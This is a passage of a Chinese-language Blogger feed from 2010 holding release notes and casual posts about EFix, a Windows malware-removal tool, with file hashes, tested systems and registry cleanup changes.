/&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1758632610942485027'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1758632610942485027'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/05/0rz_18.html' title='空間啊....0rz'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4527194410219497882</id><published>2010-05-18T10:40:00.000+08:00</published><updated>2010-05-18T10:40:27.029+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 Ver 20100518.24</title><content type='html'>版本： 5.5 20100518.24&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1222215 bytes&lt;br /&gt;MD5 &amp;nbsp; : 2cd626d95ad2a0c798cbd08120f74856&lt;br /&gt;SHA1 &amp;nbsp;: e93435adcf104be2162ce144c31cc6759fd96091&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 X86 旗艦版&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;新增刪除檔案&lt;br /&gt;:\Windows\System32\Post.exe相關&lt;br /&gt;&lt;br /&gt;清除HKU\SID... ( S-1-1-12... )和HKCU\...\NAMESPACE下的CLSID數值&lt;br /&gt;這兩個地方不應該有數值的.通常是假IE使用。&lt;br /&gt;&lt;br /&gt;系統分析部分增加掃描&lt;br /&gt;HKU\SID... ( S-1-1-12... ) 底下的NAMESPACE數值和HKCU\...\NAMESPACE數值&lt;br /&gt;&lt;br /&gt;IERESET::指令做強化&lt;br /&gt;增加HKCU\...\NAMESPACE和HKU\SID... ( S-1-1-12... )\NAMESPACE的權限值還原以及自動清除&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;1.EFTOOL原碼流失要再做修改有困難度，目前已很緩慢的進度正在重建中.&lt;br /&gt;2.IERESET::指令目前雖然有作強化，但是因為沒時間測試所以只有確定他指令&lt;br /&gt;是OK的，但效果如何就沒多測試，要有不能使用的情形的話麻煩跟我回報一下，感謝。&lt;br /&gt;3.AUTORUN.INF一般來說大多數看到都會建立一個免疫資料夾，但是這樣反而衍生了更多，有需要加到自動移除腳本內嗎？&lt;br /&gt;我個人是很想加...不過要看實際上面碰到的情形.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4527194410219497882?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4527194410219497882'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4527194410219497882'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/05/efix-55-ver-2010051824.html' title='EFix 5.5 Ver 20100518.24'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5390588991006989006</id><published>2010-05-13T12:04:00.000+08:00</published><updated>2010-05-13T12:04:20.576+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>我哩...這下慘了0rz</title><content type='html'>本來在一些論壇有和人討論有部分多餘功能要去掉所以準備要修改代碼的時候&lt;br /&gt;結果發現源碼弄丟了QQ&lt;br /&gt;&lt;br /&gt;那只好重寫....有的改0rz&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5390588991006989006?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5390588991006989006'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5390588991006989006'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/05/0rz.html' title='我哩...這下慘了0rz'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1986473274034907307</id><published>2010-04-20T13:45:00.000+08:00</published><updated>2010-04-20T13:45:01.518+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100420.18</title><content type='html'>版本：5.5 20100420.18&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1221833 bytes&lt;br /&gt;MD5...: 942bc7eaa51a95a13e7459b0dfe3ce33&lt;br /&gt;SHA1..: 4bf505bf297892d1a4c00feda2e6b0824f5956c9&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows 7 X86 旗艦版&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項&lt;br /&gt;新增刪除檔案&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;如果有看到刪除的檔案位置是在&lt;br /&gt;:\windows\system32\eset.exe&lt;br /&gt;可不要以為那是NOD32的東西，那是有問題的檔案。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1986473274034907307?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1986473274034907307'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1986473274034907307'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/04/efix-55-2010042018.html' title='EFix 5.5 20100420.18'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-9020644444556077339</id><published>2010-04-16T11:22:00.000+08:00</published><updated>2010-04-16T11:22:33.020+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100416.17</title><content type='html'>版本：5.5 20100416.17&lt;br /&gt;&lt;br /&gt;檔案資訊&lt;br /&gt;&lt;br /&gt;MD5:B27868764BF0A32DB2967798A93FFC19&lt;br /&gt;SHA1:D98BDFC457C93D3D4F327698838F9BE03CBDD940&lt;br /&gt;SIZE:1,221,875&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows 7 X86 旗艦版&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項&lt;br /&gt;修正報告中顯示日期的BUG&lt;br /&gt;新增刪除檔案&lt;br /&gt;新增LNKFILE的檢測 ( 測試階段 )&lt;br /&gt;&lt;br /&gt;還是一樣還有東西未完成不過沒時間...0rz&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-9020644444556077339?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/9020644444556077339'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/9020644444556077339'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/04/efix-55-2010041617.html' title='EFix 5.5 20100416.17'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5788939684521692475</id><published>2010-04-01T14:21:00.000+08:00</published><updated>2010-04-01T14:21:12.932+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100330.16</title><content type='html'>版本： 5.5 20100330.16&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1221289 bytes&lt;br /&gt;MD5 &amp;nbsp; : b63efce55d226cd6b174d4b7adfdab7b&lt;br /&gt;SHA1 &amp;nbsp;: 5d2d2705475d5834c3c9e1dbadfec41d7d2cb05b&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 X86 旗艦版&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正系統分析報告一些重複的錯誤&lt;br /&gt;新增刪除檔案&lt;br /&gt;增加SWREG下載的機率&lt;br /&gt;增加自訂腳本指令IERESET::&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;備註：還有一些東西還沒加...不過沒時間0rz&lt;br /&gt;所以暫時先這樣吧。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5788939684521692475?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5788939684521692475'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5788939684521692475'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/04/efix-55-2010033016.html' title='EFix 5.5 20100330.16'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-7817025676118315490</id><published>2010-03-29T22:36:00.000+08:00</published><updated>2010-03-29T22:36:32.122+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><title type='text'>有關下載空間</title><content type='html'>這邊只能跟各位說聲抱歉&lt;br /&gt;&lt;br /&gt;很多人其實都不清楚按了下載連結之後&lt;br /&gt;所出現的下載位置&lt;br /&gt;&lt;br /&gt;然而點了裡面的連結之後卻又有一堆有的沒的東西&lt;br /&gt;基本上我也不希望冏&amp;gt;&lt;br /&gt;&lt;br /&gt;不過由於最早期是使用HINET空間下載&lt;br /&gt;結果卻是常常碰到因流量過高結果導致下載出問題的情形發生&lt;br /&gt;&lt;br /&gt;一般情形就算了，頂多等晚一點再下或者是多下幾次就可以&lt;br /&gt;但是由於在一些使用自訂腳本或者是內置腳本需要下載工具時&lt;br /&gt;會變成下載失敗的情形，這樣會增加我這邊的流程處理難度&lt;br /&gt;所以我必須要將HINET空間下載取消掉，不然流量鐵爆..&lt;br /&gt;&lt;br /&gt;而我這邊也沒有適合的像是學術網路或者是可承受高流量也可直接下載的空間&lt;br /&gt;就只好擺一般的免費空間了...&lt;br /&gt;&lt;br /&gt;結果就是像現在這樣0rz&lt;br /&gt;&lt;br /&gt;但我沒辦法在去生其他可以直接連結下載的空間了...&lt;br /&gt;所以只好先這樣使用&lt;br /&gt;&lt;br /&gt;不便之處還請大家多見諒.&lt;br /&gt;&lt;br /&gt;----------------------------&lt;br /&gt;至於有好心人提供給我空間使用&lt;br /&gt;這邊先說聲非常感謝~ :)&lt;br /&gt;不過因為第一個我很低調...光是我這邊除了下載位置以外其他沒有留任何聯絡我&lt;br /&gt;的資料就知道我很低調了....&lt;br /&gt;第二個我怕麻煩...&lt;br /&gt;所以我也不是很希望因為空間下載問題所可能帶來的一些問題或麻煩。&lt;br /&gt;&lt;br /&gt;所以就目前碰到好心提供給我空間的人我都婉拒了。&lt;br /&gt;大致上是這樣。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-7817025676118315490?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7817025676118315490'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7817025676118315490'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/03/blog-post.html' title='有關下載空間'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1189527951094719428</id><published>2010-03-16T15:25:00.000+08:00</published><updated>2010-03-16T15:25:36.233+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100316.08</title><content type='html'>版本：5.5 20100316.08&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;FILE SIZE: 1220544 BYTES&lt;br /&gt;MD5...: B32057110C02B521F94B4DEAFB1D4B5A&lt;br /&gt;SHA1..: D984418DB5FB68DC523E8994E00A00CE01AA1E9B&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows 7 x86 旗艦版&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加刪除檔案&lt;br /&gt;增加檢測資源回收桶、我的電腦、網路芳鄰的CLSID值 ( 測試 )&lt;br /&gt;會針對惡意程式綁架首頁所修改的{871C5380-42A0-1069-A2EA-08002B30309D} CLSID值 作修復嘗試&lt;br /&gt;修改類型五的部分偵測方式看能不能避免掃瞄到單行超過6萬字的檔案時發生EF擋掉的情形。&lt;br /&gt;新增加偵測x64作業系統，偵測到是X64作業系統時會顯示不支援，而不是執行到一半後中斷。&lt;br /&gt;&lt;br /&gt;註：X64 一樣還是在研究，不過要支援的機率還是不高就是...&lt;br /&gt;可能最多就是讓他去偵測x86模式的程序檔案和登錄值而已，這是打包的工具限制沒辦法。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1189527951094719428?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1189527951094719428'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1189527951094719428'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/03/efix-55-2010031608.html' title='EFix 5.5 20100316.08'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6296603489409603480</id><published>2010-03-08T23:09:00.000+08:00</published><updated>2010-03-08T23:09:53.659+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>有關Windows 7 x64的支援</title><content type='html'>這兩天終於弄到x64玩了...&lt;br /&gt;&lt;br /&gt;大致試了幾個差別。&lt;br /&gt;發現想要讓目前的EFix能夠支援x64可能有一點難度....&lt;br /&gt;&lt;br /&gt;雖然說目前測試跑的x86程式單獨跑大多都OK&lt;br /&gt;原本執行到建立還原就中斷的問題是因為命令提示字符的關係&lt;br /&gt;但因為目前碰到的一些差別讓我不是很敢下去測試0rz&lt;br /&gt;&lt;br /&gt;主要問題就是在x86程式和x64程式所建立的位置問題&lt;br /&gt;比如打包的pv&lt;br /&gt;&lt;br /&gt;pv本身是x86程式&lt;br /&gt;在執行的時候也只能抓到執行中的x86程式&lt;br /&gt;x64的一率抓不到0rz&lt;br /&gt;&lt;br /&gt;而reg也是x86程式&lt;br /&gt;同樣的假設去抓HKLM\SOFTWARE\ABC登錄值&lt;br /&gt;也會去抓取HHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\ABC底下的資料&lt;br /&gt;&lt;br /&gt;然而x86和x64一般安裝的Program Files資料夾也不同&lt;br /&gt;x86的是Program Files (x86)&lt;br /&gt;然而環境變數會讓x86程式執行時自動轉換到x86對應的環境下&lt;br /&gt;所以在抓%ProgramFiles%環境變數資料夾內的數據，原本應該是:\Program Files資料夾&lt;br /&gt;結果變成:\Program Files (x86)&lt;br /&gt;&lt;br /&gt;這樣變成部分資料會抓不到&lt;br /&gt;如果就這樣隨便貿然將資料庫加上去鐵死&lt;br /&gt;&lt;br /&gt;所以目前基本上應該是沒機會支援x64了...&lt;br /&gt;&lt;br /&gt;那使用x64的使用者怎麼辦？&lt;br /&gt;由於我目前也無法得知有中x86惡意程式的話資料會怎麼寫入系統&lt;br /&gt;所以目前也沒得處理。&lt;br /&gt;&lt;br /&gt;還好目前看到x64使用者碰到惡意程式的機率比較低一些&lt;br /&gt;大多都是一些首頁綁架問題而已，一般手動處理即可。&lt;br /&gt;&lt;br /&gt;我這邊可能會編寫一個x64用的系統檢測工具 ( 用純AUTOIT撰寫，這樣就可以比較完整支援x64 )&lt;br /&gt;但不做自動清除只做偵測，因為運作機制我還完全不懂&lt;br /&gt;必須要多做研究才行...&lt;br /&gt;&lt;br /&gt;以上是自我碎碎念&lt;br /&gt;結論就是要支援x64...還早啦~&lt;br /&gt;&lt;br /&gt;------------------------------------------------------&lt;br /&gt;本來還以為改一些特殊字元的檢測就好了，一跑過之後發現完全不是那麼一回事0rz&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6296603489409603480?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6296603489409603480'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6296603489409603480'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/03/windows-7-x64.html' title='有關Windows 7 x64的支援'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-2444740374399244885</id><published>2010-02-27T21:16:00.000+08:00</published><updated>2010-02-27T21:16:55.542+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 20100227.06</title><content type='html'>版本：5.5 20100227.06&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1229517 bytes&lt;br /&gt;MD5...: a0f766f49fce88f9cf1985caff903a97&lt;br /&gt;SHA1..: 4c22a0666759f0407e43210e28036c30b6458084&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows 7 旗艦版&lt;br /&gt;&lt;br /&gt;修改事項&lt;br /&gt;新增加刪除檔案&lt;br /&gt;&lt;br /&gt;註1：&lt;br /&gt;同前除了新增刪除檔案以外沒修改任何東西&lt;br /&gt;所以基本上其他版本的作業系統使用上應該是沒問題&lt;br /&gt;&lt;br /&gt;註2：&lt;br /&gt;最近實在沒時間去碰這東西....0rz&lt;br /&gt;所以沒有特別勤的在追或者是在測試&lt;br /&gt;還請有使用的人多見諒.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-2444740374399244885?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2444740374399244885'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2444740374399244885'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/02/efix-ver-2010022706.html' title='EFix Ver 20100227.06'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1120226163196031077</id><published>2010-02-20T22:23:00.000+08:00</published><updated>2010-02-20T22:23:04.461+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 20100220.05</title><content type='html'>版本： 20100220.05&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1229378 bytes&lt;br /&gt;MD5...: 293b8e34e34e5c92f2f0b8118bcaf15e&lt;br /&gt;SHA1..: fc06e377ee71560ab601a6f8b797ceb0f7783add&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows 7 旗艦版&lt;br /&gt;&lt;br /&gt;修改事項&lt;br /&gt;增加刪除檔案，因為是kavo變種所以就只加這個.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;也因為只有加刪除檔案而已所以就沒詳細測了&lt;br /&gt;基本上其他作業系統大致上是OK啦。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1120226163196031077?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1120226163196031077'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1120226163196031077'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/02/efix-ver-2010022005.html' title='EFix Ver 20100220.05'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-7788969111634670207</id><published>2010-02-09T10:18:00.000+08:00</published><updated>2010-02-09T10:18:22.181+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><title type='text'>200萬人了</title><content type='html'>瀏覽人次到200萬人了 XD&lt;br /&gt;&lt;br /&gt;感謝各位支持&lt;br /&gt;農曆年快到了助各位心想事成萬事如意&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-7788969111634670207?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7788969111634670207'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7788969111634670207'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/02/200.html' title='200萬人了'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5492728179427784949</id><published>2010-02-03T13:31:00.000+08:00</published><updated>2010-02-03T13:31:07.174+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>考慮是不是要換個名稱</title><content type='html'>我發現還是有很多人一直在用舊版的EFix再跑&lt;br /&gt;舊到哪呢？&lt;br /&gt;舊到兩年多前的版本...0rz&lt;br /&gt;到底從哪找到的舊版本啊..連我都將原碼丟了.&lt;br /&gt;&lt;br /&gt;可是因為使用者卻完全不清楚他跑的是新版本還是舊版本&lt;br /&gt;所以常常出現跑了說沒效，跑有問題的情形出現.&lt;br /&gt;但實際上換個新版本就可以解決了.&lt;br /&gt;&lt;br /&gt;所以這邊有在想是不是要改個名稱了？&lt;br /&gt;這樣可以和以前的版本做一個區隔，就比較不會有碰到和使用者雞同鴨講的問題存在.&lt;br /&gt;&lt;br /&gt;現在做的有做版本控制和版本過舊時強制自我刪除控制&lt;br /&gt;所以就不用太擔心改版檔案沒辦法回收的問題.&lt;br /&gt;&lt;br /&gt;同樣的這名稱當初取的時候也沒想很多&lt;br /&gt;就純粹只是因為手太長打錯字所以就算了&lt;br /&gt;&lt;br /&gt;但後來發現和很多東西重複....0rz&lt;br /&gt;像是某一個讓PC上用MAC作業系統的東西&lt;br /&gt;還有相機的一個數值&lt;br /&gt;還有一間和我現在公司工作的內容差不多的公司...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;....只是要改啥名稱？&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5492728179427784949?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5492728179427784949'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5492728179427784949'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/02/blog-post.html' title='考慮是不是要換個名稱'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1705977245196098099</id><published>2010-02-01T12:07:00.000+08:00</published><updated>2010-02-01T12:07:31.414+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.5 20100201.04</title><content type='html'>版本：5.5 20100201.04&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 1220067 bytes&lt;br /&gt;MD5...: 85ddab6057f757e285b2ce1e3cbc29b7&lt;br /&gt;SHA1..: e04f365338e6282322b213d0c944fcaba9b2da55&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows XP SP2 SP3&lt;br /&gt;Windows 7 RC1 7100&lt;br /&gt;Windows 7 RTM 7600 旗艦版 ( 感謝中毒苦主測試 )&lt;br /&gt;Windows Vista SP1  ( 感謝中毒苦主測試 )&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正PendingRenameOperation登錄值顯示錯誤的問題&lt;br /&gt;新增刪除檔案&lt;br /&gt;系統分析新增找尋url捷徑&lt;br /&gt;快速啟動列原本只顯示尋找lnk捷徑，現在改成全顯示.&lt;br /&gt;新增檢測IE主檔案，未通過數位簽章會顯示出來.&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;目前用AUTOIT製作的檔案SYMANTEC會報 Suspicious.Insight&lt;br /&gt;使用這廠的防毒軟體的人請注意一下.&lt;br /&gt;目前有找人回報了，不過甚麼時候會改就不清楚.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1705977245196098099?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1705977245196098099'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1705977245196098099'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/02/efix-55-2010020104.html' title='EFix 5.5 20100201.04'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3100408071318321390</id><published>2010-01-22T17:42:00.001+08:00</published><updated>2010-01-22T17:42:53.043+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><category scheme='http://www.blogger.com/atom/ns#' term='系統'/><title type='text'>微軟 KB978207 安全性更新</title><content type='html'>用IE的人請趕快更新。&lt;br /&gt;&lt;br /&gt;這更新是修正前一陣子還蠻熱鬧的因IE漏洞導至GOOGLE被攻擊的安全性更新&lt;br 